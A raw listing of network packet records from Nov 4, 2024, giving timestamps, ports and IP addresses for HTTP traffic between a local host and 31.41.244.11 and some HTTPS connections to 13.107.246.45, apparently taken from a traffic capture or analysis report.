Nov 4, 2024 17:32:10.803921938 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.803951979 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.803997993 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.804124117 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.804182053 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.804194927 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.804228067 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.804239988 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.804260969 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.804272890 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.804285049 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.804296017 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.804303885 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.804323912 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.804367065 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.804550886 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.804563999 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.804574966 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.804599047 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.804625988 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.805370092 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.805391073 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.805408001 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.805419922 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.805425882 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.805439949 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.805454969 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.805475950 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.805475950 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.805490971 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.805519104 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.805533886 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.805572033 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.805584908 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.805614948 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.805624008 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.805641890 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.805666924 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.805694103 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.805710077 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.805756092 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.805767059 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.837584019 CET	49964	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:10.837608099 CET	443	49964	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:10.837630987 CET	49964	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:10.837644100 CET	443	49964	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:10.842895985 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.842921019 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.842950106 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.842953920 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.842963934 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.842967987 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.842979908 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.842994928 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.842994928 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.843003988 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.843014956 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.843035936 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.843048096 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.843076944 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.843121052 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.843133926 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.843162060 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.843189001 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.843218088 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.843242884 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.843256950 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.843257904 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.843286037 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.843297958 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.887862921 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.887886047 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.887902975 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.887959957 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.887985945 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.887996912 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.888008118 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.888022900 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.888032913 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.888123989 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.888123989 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.922913074 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.922945976 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.922965050 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.922988892 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.923019886 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.923065901 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.923079967 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.923095942 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.923110962 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.923125029 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.923126936 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.923156023 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.923181057 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.923206091 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.923254013 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.923336029 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.923378944 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.923424959 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.923439026 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.923465014 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.923486948 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.923501015 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.923501968 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.923526049 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.923535109 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.923563957 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.923572063 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.923767090 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.923818111 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.923867941 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.923891068 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.923906088 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.923917055 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.923927069 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.923943996 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.924269915 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.924318075 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.924323082 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.924343109 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.924365044 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.924370050 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.924385071 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.924401999 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.924410105 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.924439907 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.924472094 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.924488068 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.924514055 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.924537897 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.924593925 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.924619913 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.924638033 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.924659967 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.924715042 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.924738884 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.924752951 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.924760103 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.924767971 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.924782038 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.924793005 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.924809933 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.924983978 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.925024986 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.925599098 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.925641060 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.963856936 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.963942051 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.963970900 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.963975906 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.963992119 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.964001894 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.964009047 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.964020967 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.964035988 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.964049101 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.964059114 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.964083910 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.964096069 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.964096069 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.964109898 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.964131117 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.964149952 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.998315096 CET	49968	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:10.998358011 CET	443	49968	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:10.998473883 CET	49968	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:10.999701977 CET	49969	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:10.999743938 CET	443	49969	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:10.999809980 CET	49969	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:11.000205040 CET	49968	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:11.000217915 CET	443	49968	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:11.000344038 CET	49969	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:11.000360966 CET	443	49969	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:11.008281946 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.008313894 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.008339882 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.008363962 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.008369923 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.008378029 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.008392096 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.008399010 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.008440971 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.008474112 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.008522987 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.008538008 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.008539915 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.008565903 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.008579969 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.042359114 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.042391062 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.042407990 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.042481899 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.042541981 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.042752981 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.042800903 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.042799950 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.042809963 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.042845011 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.042860031 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.042963028 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.042980909 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.042987108 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.043000937 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.043016911 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.043046951 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.043112040 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.043134928 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.043148994 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.043169022 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.043173075 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.043189049 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.043200016 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.043231010 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.043308973 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.043343067 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.043354988 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.043364048 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.043387890 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.043406010 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.043484926 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.043487072 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.043499947 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.043514967 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.043531895 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.043564081 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.043589115 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.043643951 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.043890953 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.043905020 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.043916941 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.043941021 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.043956041 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.044029951 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.044044018 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.044085979 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.044087887 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.044105053 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.044117928 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.044132948 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.044178009 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.081183910 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.081224918 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.081252098 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.081269979 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.081295013 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.081309080 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.081320047 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.081343889 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.081357956 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.081372023 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.081383944 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.081393003 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.081451893 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.081773043 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.081806898 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.081830025 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.081831932 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.081856966 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.081870079 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.092786074 CET	443	49965	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:11.093605995 CET	49965	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:11.093626022 CET	443	49965	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:11.094141006 CET	49965	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:11.094146967 CET	443	49965	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:11.098145962 CET	443	49967	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:11.098608017 CET	49967	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:11.098619938 CET	443	49967	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:11.099006891 CET	49967	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:11.099014044 CET	443	49967	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:11.106971025 CET	443	49966	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:11.107567072 CET	49966	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:11.107588053 CET	443	49966	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:11.108059883 CET	49966	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:11.108066082 CET	443	49966	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:11.126378059 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.126411915 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.126435995 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.126450062 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.126466990 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.126508951 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.126537085 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.126588106 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.126627922 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.126631975 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.126682043 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.126770973 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.126808882 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.126826048 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.126837969 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.126849890 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.126872063 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.161422968 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.161498070 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.161509037 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.161555052 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.161581993 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.161608934 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.161998987 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.162049055 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.162082911 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.162091017 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.162101984 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.162116051 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.162134886 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.162159920 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.162198067 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.162244081 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.162276030 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.162292004 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.162318945 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.162321091 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.162333012 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.162348986 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.162363052 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.162390947 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.162527084 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.162575960 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.162596941 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.162610054 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.162631035 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.162636995 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.162647009 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.162657022 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.162662029 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.162688971 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.162705898 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.162914991 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.162930012 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.162945032 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.162964106 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.162988901 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.162996054 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.163013935 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.163033962 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.163057089 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.163362980 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.163387060 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.163409948 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.163414001 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.163424969 CET	80	49946	31.41.244.11	192.168.2.5
